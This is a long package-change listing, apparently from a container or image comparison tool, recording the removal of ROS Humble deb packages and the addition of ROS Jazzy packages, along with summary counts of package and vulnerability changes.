➖	ros-humble-geometry-msgs	4.9.0-1jammy.20251108.023944
➖	ros-humble-geometry2	0.25.17-1jammy.20251119.004847
➖	ros-humble-gmock-vendor	1.10.9006-1jammy.20250701.012110
➖	ros-humble-gtest-vendor	1.10.9006-1jammy.20250701.012018
➖	ros-humble-ignition-cmake2-vendor	0.0.2-2jammy.20250718.233501
➖	ros-humble-ignition-math6-vendor	0.0.2-2jammy.20250718.233840
➖	ros-humble-image-geometry	3.2.1-1jammy.20251108.035708
➖	ros-humble-image-tools	0.20.7-1jammy.20251118.221049
➖	ros-humble-image-transport	3.1.12-1jammy.20251118.224636
➖	ros-humble-interactive-markers	2.3.2-2jammy.20251118.230321
➖	ros-humble-intra-process-demo	0.20.7-1jammy.20251118.215313
➖	ros-humble-joy	3.3.0-1jammy.20251118.224705
➖	ros-humble-kdl-parser	2.6.4-1jammy.20251118.234017
➖	ros-humble-keyboard-handler	0.0.5-1jammy.20250718.232859
➖	ros-humble-laser-geometry	2.4.1-1jammy.20251118.220052
➖	ros-humble-launch	1.0.13-1jammy.20251108.011145
➖	ros-humble-launch-ros	0.19.13-1jammy.20251118.220624
➖	ros-humble-launch-testing	1.0.13-1jammy.20251108.011612
➖	ros-humble-launch-testing-ament-cmake	1.0.13-1jammy.20251108.012020
➖	ros-humble-launch-testing-ros	0.19.13-1jammy.20251118.220837
➖	ros-humble-launch-xml	1.0.13-1jammy.20251108.011503
➖	ros-humble-launch-yaml	1.0.13-1jammy.20251108.011529
➖	ros-humble-libcurl-vendor	3.1.3-1jammy.20250701.022705
➖	ros-humble-libmavconn	2.12.0-1jammy.20250915.035448
➖	ros-humble-libstatistics-collector	1.3.4-1jammy.20251108.033552
➖	ros-humble-libyaml-vendor	1.2.2-2jammy.20251108.013354
➖	ros-humble-lifecycle	0.20.7-1jammy.20251119.003637
➖	ros-humble-lifecycle-msgs	1.2.2-1jammy.20251108.015727

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

➖	ros-humble-logging-demo	0.20.7-1jammy.20251118.221052
➖	ros-humble-map-msgs	2.1.0-3jammy.20251108.030020
➖	ros-humble-mavlink	2025.9.9-1jammy.20250909.183026
➖	ros-humble-mavros	2.12.0-1jammy.20251119.004646
➖	ros-humble-mavros-extras	2.12.0-1jammy.20251119.011356
➖	ros-humble-mavros-msgs	2.12.0-1jammy.20251108.030448
➖	ros-humble-message-filters	4.3.11-1jammy.20251118.220431
➖	ros-humble-nav-msgs	4.9.0-1jammy.20251108.024838
➖	ros-humble-orocos-kdl-vendor	0.2.5-1jammy.20250718.232944
➖	ros-humble-osrf-pycommon	2.1.6-1jammy.20250701.012314
➖	ros-humble-pcl-conversions	2.4.5-2jammy.20251118.224826
➖	ros-humble-pcl-msgs	1.0.0-7jammy.20251108.030547
➖	ros-humble-pendulum-control	0.20.7-1jammy.20251118.233239
➖	ros-humble-pendulum-msgs	0.20.7-1jammy.20251118.151009
➖	ros-humble-pluginlib	5.1.2-1jammy.20251118.215951
➖	ros-humble-pybind11-vendor	2.4.2-1jammy.20250701.023136
➖	ros-humble-python-cmake-module	0.10.0-2jammy.20250718.233024
➖	ros-humble-python-orocos-kdl-vendor	0.2.5-1jammy.20250718.233102
➖	ros-humble-python-qt-binding	1.1.3-1jammy.20251008.150450
➖	ros-humble-qt-dotgraph	2.2.4-1jammy.20251008.151420
➖	ros-humble-qt-gui	2.2.4-1jammy.20251008.151702
➖	ros-humble-qt-gui-cpp	2.2.4-1jammy.20251118.233911
➖	ros-humble-qt-gui-py-common	2.2.4-1jammy.20251008.151558
➖	ros-humble-quality-of-service-demo-cpp	0.20.7-1jammy.20251118.220824
➖	ros-humble-quality-of-service-demo-py	0.20.7-1jammy.20251118.215319
➖	ros-humble-rcl	5.3.11-1jammy.20251108.032430
➖	ros-humble-rcl-action	5.3.11-1jammy.20251108.033532
➖	ros-humble-rcl-interfaces	1.2.2-1jammy.20251108.022814
➖	ros-humble-rcl-lifecycle	5.3.11-1jammy.20251108.033537
➖	ros-humble-rcl-logging-interface	2.3.1-1jammy.20251108.013543
➖	ros-humble-rcl-logging-spdlog	2.3.1-1jammy.20251108.013813
➖	ros-humble-rcl-yaml-param-parser	5.3.11-1jammy.20251108.014240
➖	ros-humble-rclcpp	16.0.16-1jammy.20251118.151028
➖	ros-humble-rclcpp-action	16.0.16-1jammy.20251118.215320
➖	ros-humble-rclcpp-components	16.0.16-1jammy.20251118.215335
➖	ros-humble-rclcpp-lifecycle	16.0.16-1jammy.20251118.215734
➖	ros-humble-rclpy	3.3.19-1jammy.20251118.151334
➖	ros-humble-rcpputils	2.4.6-1jammy.20251108.013008
➖	ros-humble-rcutils	5.1.7-1jammy.20251108.012306
➖	ros-humble-resource-retriever	3.1.3-1jammy.20250718.234149
➖	ros-humble-rmw	6.1.2-1jammy.20251108.013651
➖	ros-humble-rmw-dds-common	1.6.0-2jammy.20251108.015631
➖	ros-humble-rmw-fastrtps-cpp	6.2.9-1jammy.20251108.023501
➖	ros-humble-rmw-fastrtps-shared-cpp	6.2.9-1jammy.20251108.020001
➖	ros-humble-rmw-implementation	2.8.5-1jammy.20251108.032123
➖	ros-humble-rmw-implementation-cmake	6.1.2-1jammy.20250718.233031
➖	ros-humble-robot-state-publisher	3.0.3-2jammy.20251118.234209
➖	ros-humble-ros-base	0.10.0-1jammy.20251119.014616
➖	ros-humble-ros-core	0.10.0-1jammy.20251119.004051
➖	ros-humble-ros-environment	3.2.2-1jammy.20250701.011457
➖	ros-humble-ros-workspace	1.0.2-2jammy.20250701.005808
➖	ros-humble-ros2action	0.18.15-1jammy.20251118.221100
➖	ros-humble-ros2bag	0.15.15-1jammy.20251119.003256
➖	ros-humble-ros2cli	0.18.15-1jammy.20251118.215557
➖	ros-humble-ros2cli-common-extensions	0.1.1-4jammy.20251119.003908
➖	ros-humble-ros2component	0.18.15-1jammy.20251118.221705
➖	ros-humble-ros2doctor	0.18.15-1jammy.20251118.221052
➖	ros-humble-ros2interface	0.18.15-1jammy.20251118.221055
➖	ros-humble-ros2launch	0.19.13-1jammy.20251118.233051
➖	ros-humble-ros2lifecycle	0.18.15-1jammy.20251118.234415
➖	ros-humble-ros2multicast	0.18.15-1jammy.20251118.220017
➖	ros-humble-ros2node	0.18.15-1jammy.20251118.221056
➖	ros-humble-ros2param	0.18.15-1jammy.20251118.221506
➖	ros-humble-ros2pkg	0.18.15-1jammy.20251118.221050
➖	ros-humble-ros2run	0.18.15-1jammy.20251118.221240
➖	ros-humble-ros2service	0.18.15-1jammy.20251118.221107
➖	ros-humble-ros2topic	0.18.15-1jammy.20251118.221105
➖	ros-humble-rosbag2	0.15.15-1jammy.20251119.014438
➖	ros-humble-rosbag2-compression	0.15.15-1jammy.20251118.235623
➖	ros-humble-rosbag2-compression-zstd	0.15.15-1jammy.20251119.000640
➖	ros-humble-rosbag2-cpp	0.15.15-1jammy.20251118.234628
➖	ros-humble-rosbag2-interfaces	0.15.15-1jammy.20251108.021001
➖	ros-humble-rosbag2-py	0.15.15-1jammy.20251119.002922
➖	ros-humble-rosbag2-storage	0.15.15-1jammy.20251118.233703
➖	ros-humble-rosbag2-storage-default-plugins	0.15.15-1jammy.20251118.234113
➖	ros-humble-rosbag2-transport	0.15.15-1jammy.20251119.000926
➖	ros-humble-rosgraph-msgs	1.2.2-1jammy.20251108.022955
➖	ros-humble-rosidl-adapter	3.1.7-1jammy.20250718.233101
➖	ros-humble-rosidl-cli	3.1.7-1jammy.20250718.231315
➖	ros-humble-rosidl-cmake	3.1.7-1jammy.20250718.233348
➖	ros-humble-rosidl-default-generators	1.2.0-2jammy.20251108.014936
➖	ros-humble-rosidl-default-runtime	1.2.0-2jammy.20251108.014934
➖	ros-humble-rosidl-generator-c	3.1.7-1jammy.20251108.013403
➖	ros-humble-rosidl-generator-cpp	3.1.7-1jammy.20251108.013711
➖	ros-humble-rosidl-generator-py	0.14.6-1jammy.20251108.014657
➖	ros-humble-rosidl-parser	3.1.7-1jammy.20250718.233219
➖	ros-humble-rosidl-runtime-c	3.1.7-1jammy.20251108.013012
➖	ros-humble-rosidl-runtime-cpp	3.1.7-1jammy.20251108.013249
➖	ros-humble-rosidl-runtime-py	0.9.3-1jammy.20251108.031849
➖	ros-humble-rosidl-typesupport-c	2.0.2-1jammy.20251108.013559
➖	ros-humble-rosidl-typesupport-cpp	2.0.2-1jammy.20251108.013900
➖	ros-humble-rosidl-typesupport-fastrtps-c	2.2.3-1jammy.20251108.014342
➖	ros-humble-rosidl-typesupport-fastrtps-cpp	2.2.3-1jammy.20251108.014119
➖	ros-humble-rosidl-typesupport-interface	3.1.7-1jammy.20250718.233051
➖	ros-humble-rosidl-typesupport-introspection-c	3.1.7-1jammy.20251108.013248
➖	ros-humble-rosidl-typesupport-introspection-cpp	3.1.7-1jammy.20251108.013603
➖	ros-humble-rpyutils	0.2.2-1jammy.20250920.001004
➖	ros-humble-rqt-action	2.0.1-3jammy.20251119.003756
➖	ros-humble-rqt-bag	1.1.5-1jammy.20251119.003605
➖	ros-humble-rqt-bag-plugins	1.1.5-1jammy.20251119.014612
➖	ros-humble-rqt-common-plugins	1.2.0-1jammy.20251119.014638
➖	ros-humble-rqt-console	2.0.3-1jammy.20251119.003629
➖	ros-humble-rqt-graph	1.3.1-1jammy.20251119.003747
➖	ros-humble-rqt-gui	1.1.9-1jammy.20251118.220921
➖	ros-humble-rqt-gui-cpp	1.1.9-1jammy.20251118.234640
➖	ros-humble-rqt-gui-py	1.1.9-1jammy.20251119.003313
➖	ros-humble-rqt-image-view	1.2.0-2jammy.20251118.235106
➖	ros-humble-rqt-msg	1.2.0-1jammy.20251119.003724
➖	ros-humble-rqt-plot	1.1.5-1jammy.20251119.003710
➖	ros-humble-rqt-publisher	1.5.0-1jammy.20251119.003749
➖	ros-humble-rqt-py-common	1.1.9-1jammy.20251118.220934
➖	ros-humble-rqt-py-console	1.0.2-3jammy.20251119.003708
➖	ros-humble-rqt-reconfigure	1.1.2-1jammy.20251119.003727
➖	ros-humble-rqt-service-caller	1.0.5-3jammy.20251119.003809
➖	ros-humble-rqt-shell	1.0.2-3jammy.20251119.003810
➖	ros-humble-rqt-srv	1.0.3-3jammy.20251119.003757
➖	ros-humble-rqt-topic	1.5.0-1jammy.20251119.003827
➖	ros-humble-rttest	0.13.0-2jammy.20250718.233059
➖	ros-humble-rviz-assimp-vendor	11.2.23-1jammy.20251108.011059
➖	ros-humble-rviz-common	11.2.23-1jammy.20251118.230211
➖	ros-humble-rviz-default-plugins	11.2.23-1jammy.20251119.005102
➖	ros-humble-rviz-ogre-vendor	11.2.23-1jammy.20251108.011149
➖	ros-humble-rviz-rendering	11.2.23-1jammy.20251108.015125
➖	ros-humble-rviz2	11.2.23-1jammy.20251119.020146
➖	ros-humble-sdl2-vendor	3.3.0-1jammy.20250701.023350
➖	ros-humble-sensor-msgs	4.9.0-1jammy.20251108.024934
➖	ros-humble-sensor-msgs-py	4.9.0-1jammy.20251108.035715
➖	ros-humble-shape-msgs	4.9.0-1jammy.20251108.025223
➖	ros-humble-shared-queues-vendor	0.15.15-1jammy.20250716.201149
➖	ros-humble-spdlog-vendor	1.3.1-1jammy.20250718.233124
➖	ros-humble-sqlite3-vendor	0.15.15-1jammy.20250716.201156
➖	ros-humble-sros2	0.10.7-1jammy.20251119.003656
➖	ros-humble-sros2-cmake	0.10.7-1jammy.20251119.003916
➖	ros-humble-statistics-msgs	1.2.2-1jammy.20251108.023002
➖	ros-humble-std-msgs	4.9.0-1jammy.20251108.023006
➖	ros-humble-std-srvs	4.9.0-1jammy.20251108.015822
➖	ros-humble-stereo-msgs	4.9.0-1jammy.20251108.030707
➖	ros-humble-tango-icons-vendor	0.1.1-3jammy.20250718.233139
➖	ros-humble-teleop-twist-joy	2.4.8-1jammy.20251118.225054
➖	ros-humble-teleop-twist-keyboard	2.4.1-1jammy.20251118.220947
➖	ros-humble-tf2	0.25.17-1jammy.20251108.025400
➖	ros-humble-tf2-bullet	0.25.17-1jammy.20251119.004436
➖	ros-humble-tf2-eigen	0.25.17-1jammy.20251119.004439
➖	ros-humble-tf2-eigen-kdl	0.25.17-1jammy.20251108.035817
➖	ros-humble-tf2-geometry-msgs	0.25.17-1jammy.20251118.225946
➖	ros-humble-tf2-kdl	0.25.17-1jammy.20251118.230031
➖	ros-humble-tf2-msgs	0.25.17-1jammy.20251108.024600
➖	ros-humble-tf2-py	0.25.17-1jammy.20251118.220957
➖	ros-humble-tf2-ros	0.25.17-1jammy.20251118.224851
➖	ros-humble-tf2-ros-py	0.25.17-1jammy.20251118.221142
➖	ros-humble-tf2-sensor-msgs	0.25.17-1jammy.20251118.230037
➖	ros-humble-tf2-tools	0.25.17-1jammy.20251118.221328
➖	ros-humble-tinyxml-vendor	0.8.3-2jammy.20250701.023457
➖	ros-humble-tinyxml2-vendor	0.7.7-1jammy.20251118.151334
➖	ros-humble-tlsf	0.7.0-2jammy.20250718.233139
➖	ros-humble-tlsf-cpp	0.13.0-2jammy.20251118.232941
➖	ros-humble-topic-monitor	0.20.7-1jammy.20251118.220827
➖	ros-humble-tracetools	4.1.1-1jammy.20250718.233947
➖	ros-humble-trajectory-msgs	4.9.0-1jammy.20251108.025231
➖	ros-humble-turtlesim	1.4.3-1jammy.20251118.232100
➖	ros-humble-uncrustify-vendor	2.0.2-2jammy.20250701.023540
➖	ros-humble-unique-identifier-msgs	2.2.1-3jammy.20251108.015832
➖	ros-humble-urdf	2.6.1-1jammy.20251118.220208
➖	ros-humble-urdf-parser-plugin	2.6.1-1jammy.20250718.233712
➖	ros-humble-urdfdom	3.0.2-2jammy.20250718.233620
➖	ros-humble-urdfdom-headers	1.0.6-2jammy.20250701.012413
➖	ros-humble-visualization-msgs	4.9.0-1jammy.20251108.030641
➖	ros-humble-yaml-cpp-vendor	8.0.2-1jammy.20250701.023557
➖	ros-humble-zstd-vendor	0.15.15-1jammy.20250716.201156
➕	ros-jazzy-action-msgs		2.0.3-1noble.20260126.172111
➕	ros-jazzy-action-tutorials-cpp		0.33.9-1noble.20260126.180442
➕	ros-jazzy-action-tutorials-interfaces		0.33.9-1noble.20260126.172519
➕	ros-jazzy-action-tutorials-py		0.33.9-1noble.20260126.175511
➕	ros-jazzy-actionlib-msgs		5.3.6-1noble.20260126.173038
➕	ros-jazzy-ament-cmake		2.5.5-1noble.20260121.181635
➕	ros-jazzy-ament-cmake-auto		2.5.5-1noble.20260121.182432
➕	ros-jazzy-ament-cmake-copyright		0.17.4-1noble.20260121.181252
➕	ros-jazzy-ament-cmake-core		2.5.5-1noble.20260121.175042
➕	ros-jazzy-ament-cmake-cppcheck		0.17.4-1noble.20260121.181240
➕	ros-jazzy-ament-cmake-cpplint		0.17.4-1noble.20260121.181235
➕	ros-jazzy-ament-cmake-export-definitions		2.5.5-1noble.20260121.180318
➕	ros-jazzy-ament-cmake-export-dependencies		2.5.5-1noble.20260121.180807
➕	ros-jazzy-ament-cmake-export-include-directories		2.5.5-1noble.20260121.180330
➕	ros-jazzy-ament-cmake-export-interfaces		2.5.5-1noble.20260121.180318
➕	ros-jazzy-ament-cmake-export-libraries		2.5.5-1noble.20260121.180240
➕	ros-jazzy-ament-cmake-export-link-flags		2.5.5-1noble.20260121.180211
➕	ros-jazzy-ament-cmake-export-targets		2.5.5-1noble.20260121.180310
➕	ros-jazzy-ament-cmake-flake8		0.17.4-1noble.20260121.181222
➕	ros-jazzy-ament-cmake-gen-version-h		2.5.5-1noble.20260121.180336
➕	ros-jazzy-ament-cmake-gmock		2.5.5-1noble.20260121.181129
➕	ros-jazzy-ament-cmake-gtest		2.5.5-1noble.20260121.181049
➕	ros-jazzy-ament-cmake-include-directories		2.5.5-1noble.20260121.180338
➕	ros-jazzy-ament-cmake-libraries		2.5.5-1noble.20260121.180341
➕	ros-jazzy-ament-cmake-lint-cmake		0.17.4-1noble.20260121.181237
➕	ros-jazzy-ament-cmake-pep257		0.17.4-1noble.20260121.181149
➕	ros-jazzy-ament-cmake-pytest		2.5.5-1noble.20260121.181159
➕	ros-jazzy-ament-cmake-python		2.5.5-1noble.20260121.180343
➕	ros-jazzy-ament-cmake-ros		0.12.0-3noble.20260121.182437
➕	ros-jazzy-ament-cmake-target-dependencies		2.5.5-1noble.20260121.180808
➕	ros-jazzy-ament-cmake-test		2.5.5-1noble.20260121.180905
➕	ros-jazzy-ament-cmake-uncrustify		0.17.4-1noble.20260121.182252
➕	ros-jazzy-ament-cmake-version		2.5.5-1noble.20260121.180401
➕	ros-jazzy-ament-cmake-xmllint		0.17.4-1noble.20260121.181202
➕	ros-jazzy-ament-copyright		0.17.4-1noble.20260121.175820
➕	ros-jazzy-ament-cppcheck		0.17.4-1noble.20260121.180207
➕	ros-jazzy-ament-cpplint		0.17.4-1noble.20260121.180155
➕	ros-jazzy-ament-flake8		0.17.4-1noble.20260121.175806
➕	ros-jazzy-ament-index-cpp		1.8.2-1noble.20260121.182447
➕	ros-jazzy-ament-index-python		1.8.2-1noble.20260121.175733
➕	ros-jazzy-ament-lint		0.17.4-1noble.20260121.175735
➕	ros-jazzy-ament-lint-auto		0.17.4-1noble.20260121.181208
➕	ros-jazzy-ament-lint-cmake		0.17.4-1noble.20260121.180141
➕	ros-jazzy-ament-lint-common		0.17.4-1noble.20260121.182324
➕	ros-jazzy-ament-package		0.16.5-1noble.20260121.174946
➕	ros-jazzy-ament-pep257		0.17.4-1noble.20260121.175813
➕	ros-jazzy-ament-uncrustify		0.17.4-1noble.20260121.182220
➕	ros-jazzy-ament-xmllint		0.17.4-1noble.20260121.175852
➕	ros-jazzy-angles		1.16.1-1noble.20260121.182519
➕	ros-jazzy-builtin-interfaces		2.0.3-1noble.20260126.171712
➕	ros-jazzy-class-loader		2.7.0-3noble.20260126.170731
➕	ros-jazzy-common-interfaces		5.3.6-1noble.20260126.175440
➕	ros-jazzy-composition		0.33.9-1noble.20260126.181632
➕	ros-jazzy-composition-interfaces		2.0.3-1noble.20260126.173540
➕	ros-jazzy-console-bridge-vendor		1.7.1-3noble.20260121.184936
➕	ros-jazzy-cv-bridge		4.1.0-1noble.20260126.175659
➕	ros-jazzy-demo-nodes-cpp		0.33.9-1noble.20260126.175928
➕	ros-jazzy-demo-nodes-cpp-native		0.33.9-1noble.20260126.181954
➕	ros-jazzy-demo-nodes-py		0.33.9-1noble.20260126.181552
➕	ros-jazzy-depthimage-to-laserscan		2.5.1-3noble.20260126.192344
➕	ros-jazzy-desktop		0.11.0-1noble.20260126.203157
➕	ros-jazzy-diagnostic-msgs		5.3.6-1noble.20260126.174048
➕	ros-jazzy-diagnostic-updater		4.2.6-1noble.20260126.181554
➕	ros-jazzy-domain-coordinator		0.12.0-3noble.20260121.175748
➕	ros-jazzy-dummy-map-server		0.33.9-1noble.20260126.190016
➕	ros-jazzy-dummy-robot-bringup		0.33.9-1noble.20260126.194818
➕	ros-jazzy-dummy-sensors		0.33.9-1noble.20260126.191519
➕	ros-jazzy-eigen-stl-containers		1.1.0-1noble.20260121.183553
➕	ros-jazzy-eigen3-cmake-module		0.3.0-3noble.20260121.183549
➕	ros-jazzy-example-interfaces		0.12.0-3noble.20260126.172735
➕	ros-jazzy-examples-rclcpp-minimal-action-client		0.19.7-1noble.20260126.182525
➕	ros-jazzy-examples-rclcpp-minimal-action-server		0.19.7-1noble.20260126.182543
➕	ros-jazzy-examples-rclcpp-minimal-client		0.19.7-1noble.20260126.182620
➕	ros-jazzy-examples-rclcpp-minimal-composition		0.19.7-1noble.20260126.181956
➕	ros-jazzy-examples-rclcpp-minimal-publisher		0.19.7-1noble.20260126.182355
➕	ros-jazzy-examples-rclcpp-minimal-service		0.19.7-1noble.20260126.182633
➕	ros-jazzy-examples-rclcpp-minimal-subscriber		0.19.7-1noble.20260126.181959
➕	ros-jazzy-examples-rclcpp-minimal-timer		0.19.7-1noble.20260126.193948
➕	ros-jazzy-examples-rclcpp-multithreaded-executor		0.19.7-1noble.20260126.182403
➕	ros-jazzy-examples-rclpy-executors		0.19.7-1noble.20260126.181609
➕	ros-jazzy-examples-rclpy-minimal-action-client		0.19.7-1noble.20260126.175443
➕	ros-jazzy-examples-rclpy-minimal-action-server		0.19.7-1noble.20260126.182548
➕	ros-jazzy-examples-rclpy-minimal-client		0.19.7-1noble.20260126.181613
➕	ros-jazzy-examples-rclpy-minimal-publisher		0.19.7-1noble.20260126.181623
➕	ros-jazzy-examples-rclpy-minimal-service		0.19.7-1noble.20260126.181623
➕	ros-jazzy-examples-rclpy-minimal-subscriber		0.19.7-1noble.20260126.181625
➕	ros-jazzy-fastcdr		2.2.5-1noble.20260121.175748
➕	ros-jazzy-fastrtps		2.14.5-2noble.20260121.180353
➕	ros-jazzy-fastrtps-cmake-module		3.6.3-1noble.20260121.183908
➕	ros-jazzy-foonathan-memory-vendor		1.3.1-3noble.20260121.180217
➕	ros-jazzy-geographic-msgs		1.0.6-2noble.20260126.174609
➕	ros-jazzy-geometry-msgs		5.3.6-1noble.20260126.173651
➕	ros-jazzy-geometry2		0.36.19-1noble.20260126.191205
➕	ros-jazzy-gmock-vendor		1.14.9000-2noble.20260121.175918
➕	ros-jazzy-gtest-vendor		1.14.9000-2noble.20260121.175751
➕	ros-jazzy-gz-cmake-vendor		0.0.10-1noble.20260121.181641
➕	ros-jazzy-gz-math-vendor		0.0.8-1noble.20260121.181925
➕	ros-jazzy-gz-utils-vendor		0.0.5-1noble.20260121.181749
➕	ros-jazzy-image-geometry		4.1.0-1noble.20260126.191522
➕	ros-jazzy-image-tools		0.33.9-1noble.20260126.182024
➕	ros-jazzy-image-transport		5.1.7-1noble.20260126.180049
➕	ros-jazzy-interactive-markers		2.5.5-1noble.20260126.184115
➕	ros-jazzy-intra-process-demo		0.33.9-1noble.20260126.182256
➕	ros-jazzy-joy		3.3.0-3noble.20260126.190948
➕	ros-jazzy-kdl-parser		2.11.0-3noble.20260126.171717
➕	ros-jazzy-keyboard-handler		0.3.2-1noble.20260121.233418
➕	ros-jazzy-laser-geometry		2.7.2-1noble.20260126.190531
➕	ros-jazzy-launch		3.4.10-1noble.20260121.175939
➕	ros-jazzy-launch-ros		0.26.11-1noble.20260126.175625
➕	ros-jazzy-launch-testing		3.4.10-1noble.20260121.180201
➕	ros-jazzy-launch-testing-ament-cmake		3.4.10-1noble.20260121.185614
➕	ros-jazzy-launch-testing-ros		0.26.11-1noble.20260126.192739
➕	ros-jazzy-launch-xml		3.4.10-1noble.20260121.180051
➕	ros-jazzy-launch-yaml		3.4.10-1noble.20260121.180052
➕	ros-jazzy-libcurl-vendor		3.4.4-1noble.20260121.185515
➕	ros-jazzy-liblz4-vendor		0.26.9-1noble.20260125.195159
➕	ros-jazzy-libmavconn		2.14.0-1noble.20260121.184649
➕	ros-jazzy-libstatistics-collector		1.7.4-1noble.20260126.174616
➕	ros-jazzy-libyaml-vendor		1.6.3-2noble.20260121.185520
➕	ros-jazzy-lifecycle		0.33.9-1noble.20260126.181032
➕	ros-jazzy-lifecycle-msgs		2.0.3-1noble.20260126.172741
➕	ros-jazzy-logging-demo		0.33.9-1noble.20260126.180155
➕	ros-jazzy-map-msgs		2.4.1-2noble.20260126.175133
➕	ros-jazzy-mavlink		2025.12.12-1noble.20260121.184242
➕	ros-jazzy-mavros		2.14.0-1noble.20260126.183901
➕	ros-jazzy-mavros-extras		2.14.0-1noble.20260126.190521
➕	ros-jazzy-mavros-msgs		2.14.0-1noble.20260126.175124
➕	ros-jazzy-mcap-vendor		0.26.9-1noble.20260125.195843
➕	ros-jazzy-message-filters		4.11.10-1noble.20260126.175703
➕	ros-jazzy-nav-msgs		5.3.6-1noble.20260126.174111
➕	ros-jazzy-orocos-kdl-vendor		0.5.1-2noble.20260121.183805
➕	ros-jazzy-osrf-pycommon		2.1.7-1noble.20260121.175902
➕	ros-jazzy-pcl-conversions		2.6.2-1noble.20260126.181703
➕	ros-jazzy-pcl-msgs		1.0.0-9noble.20260126.175230
➕	ros-jazzy-pendulum-control		0.33.9-1noble.20260126.182659
➕	ros-jazzy-pendulum-msgs		0.33.9-1noble.20260126.172751
➕	ros-jazzy-pluginlib		5.4.4-1noble.20260126.171259
➕	ros-jazzy-point-cloud-transport		4.0.7-1noble.20260126.175942

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2656 changes)

➕	ros-jazzy-pybind11-vendor		3.1.3-1noble.20260121.190126
➕	ros-jazzy-python-cmake-module		0.11.1-2noble.20260121.185427
➕	ros-jazzy-python-orocos-kdl-vendor		0.5.1-2noble.20260121.190419
➕	ros-jazzy-python-qt-binding		2.2.2-1noble.20260121.184557
➕	ros-jazzy-qt-dotgraph		2.7.5-1noble.20260121.184822
➕	ros-jazzy-qt-gui		2.7.5-1noble.20260121.233954
➕	ros-jazzy-qt-gui-cpp		2.7.5-1noble.20260126.171334
➕	ros-jazzy-qt-gui-py-common		2.7.5-1noble.20260121.184824
➕	ros-jazzy-quality-of-service-demo-cpp		0.33.9-1noble.20260126.181653
➕	ros-jazzy-quality-of-service-demo-py		0.33.9-1noble.20260126.181714
➕	ros-jazzy-rcl		9.2.9-1noble.20260126.174356
➕	ros-jazzy-rcl-action		9.2.9-1noble.20260126.174622
➕	ros-jazzy-rcl-interfaces		2.0.3-1noble.20260126.172904
➕	ros-jazzy-rcl-lifecycle		9.2.9-1noble.20260126.174629
➕	ros-jazzy-rcl-logging-interface		3.1.1-1noble.20260121.182751
➕	ros-jazzy-rcl-logging-spdlog		3.1.1-1noble.20260126.170620
➕	ros-jazzy-rcl-yaml-param-parser		9.2.9-1noble.20260126.170951
➕	ros-jazzy-rclcpp		28.1.16-1noble.20260126.174811
➕	ros-jazzy-rclcpp-action		28.1.16-1noble.20260126.175649
➕	ros-jazzy-rclcpp-components		28.1.16-1noble.20260126.175650
➕	ros-jazzy-rclcpp-lifecycle		28.1.16-1noble.20260126.175705
➕	ros-jazzy-rclpy		7.1.9-1noble.20260126.174822
➕	ros-jazzy-rcpputils		2.11.3-1noble.20260126.165804
➕	ros-jazzy-rcutils		6.7.5-1noble.20260121.182606
➕	ros-jazzy-resource-retriever		3.4.4-1noble.20260121.185929
➕	ros-jazzy-rmw		7.3.3-1noble.20260121.233900
➕	ros-jazzy-rmw-dds-common		3.1.1-1noble.20260126.172514
➕	ros-jazzy-rmw-fastrtps-cpp		8.4.3-1noble.20260126.173317
➕	ros-jazzy-rmw-fastrtps-shared-cpp		8.4.3-1noble.20260126.172842
➕	ros-jazzy-rmw-implementation		2.15.6-1noble.20260126.174148
➕	ros-jazzy-rmw-implementation-cmake		7.3.3-1noble.20260121.233918
➕	ros-jazzy-robot-state-publisher		3.3.3-3noble.20260126.180730
➕	ros-jazzy-ros-base		0.11.0-1noble.20260126.203129
➕	ros-jazzy-ros-core		0.11.0-1noble.20260126.203057
➕	ros-jazzy-ros-environment		4.2.1-1noble.20260121.180302
➕	ros-jazzy-ros-workspace		1.0.3-7noble.20260121.175541
➕	ros-jazzy-ros2action		0.32.8-1noble.20260126.192817
➕	ros-jazzy-ros2bag		0.26.9-1noble.20260126.193459
➕	ros-jazzy-ros2cli		0.32.8-1noble.20260126.192739
➕	ros-jazzy-ros2cli-common-extensions		0.3.1-1noble.20260126.203029
➕	ros-jazzy-ros2component		0.32.8-1noble.20260126.202956
➕	ros-jazzy-ros2doctor		0.32.8-1noble.20260126.192820
➕	ros-jazzy-ros2interface		0.32.8-1noble.20260126.202239
➕	ros-jazzy-ros2launch		0.26.11-1noble.20260126.202330
➕	ros-jazzy-ros2lifecycle		0.32.8-1noble.20260126.193225
➕	ros-jazzy-ros2multicast		0.32.8-1noble.20260126.202240
➕	ros-jazzy-ros2node		0.32.8-1noble.20260126.192838
➕	ros-jazzy-ros2param		0.32.8-1noble.20260126.193357
➕	ros-jazzy-ros2pkg		0.32.8-1noble.20260126.202246
➕	ros-jazzy-ros2plugin		5.4.4-1noble.20260126.202329
➕	ros-jazzy-ros2run		0.32.8-1noble.20260126.202337
➕	ros-jazzy-ros2service		0.32.8-1noble.20260126.193042
➕	ros-jazzy-ros2topic		0.32.8-1noble.20260126.192902
➕	ros-jazzy-rosbag2		0.26.9-1noble.20260126.200739
➕	ros-jazzy-rosbag2-compression		0.26.9-1noble.20260126.180521
➕	ros-jazzy-rosbag2-compression-zstd		0.26.9-1noble.20260126.180747
➕	ros-jazzy-rosbag2-cpp		0.26.9-1noble.20260126.180134
➕	ros-jazzy-rosbag2-interfaces		0.26.9-1noble.20260126.172516
➕	ros-jazzy-rosbag2-py		0.26.9-1noble.20260126.192741
➕	ros-jazzy-rosbag2-storage		0.26.9-1noble.20260126.175840
➕	ros-jazzy-rosbag2-storage-default-plugins		0.26.9-1noble.20260126.200653
➕	ros-jazzy-rosbag2-storage-mcap		0.26.9-1noble.20260126.180138
➕	ros-jazzy-rosbag2-storage-sqlite3		0.26.9-1noble.20260126.180134
➕	ros-jazzy-rosbag2-transport		0.26.9-1noble.20260126.180748
➕	ros-jazzy-rosgraph-msgs		2.0.3-1noble.20260126.172519
➕	ros-jazzy-rosidl-adapter		4.6.7-1noble.20260121.190135
➕	ros-jazzy-rosidl-cli		4.6.7-1noble.20260121.175929
➕	ros-jazzy-rosidl-cmake		4.6.7-1noble.20260121.190524
➕	ros-jazzy-rosidl-core-generators		0.2.0-3noble.20260126.171359
